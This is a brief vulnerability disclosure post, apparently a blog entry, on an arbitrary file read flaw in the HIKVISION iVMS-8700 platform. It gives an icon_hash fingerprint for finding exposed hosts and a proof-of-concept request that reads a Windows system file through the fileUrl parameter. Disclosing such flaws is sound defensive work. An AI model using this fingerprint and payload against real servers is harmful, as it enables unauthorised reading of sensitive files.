Hikvision Ivms 8700 Comprehensive Security Management Platform Download Any File Download Vulnerability
Hikvision Ivms 8700 Comprehensive Security Management Platform Download Any File Download Vulnerability
HIKVISION iVMS-8700 Comprehensive Security Management Platform Download Any File Download Vulnerability
Vulnerability Description
There is a vulnerability to read any file in the HIKVISION iVMS-8700 comprehensive security management platform. The attacker can read sensitive files in the server by sending a specific request packet.
Vulnerability Impact
HIKVISION iVMS-8700 Comprehensive Security Management Platform
Network surveying and mapping
icon_hash=”-911494769”
Vulnerability reappears
Login page
Verify POC, token is Url md5
1
/eps/api/triggerSnapshot/download?token=xxx&fileUrl=file:///C:/windows/win.ini&fileName=1
This post is licensed under CC BY 4.0 by the author.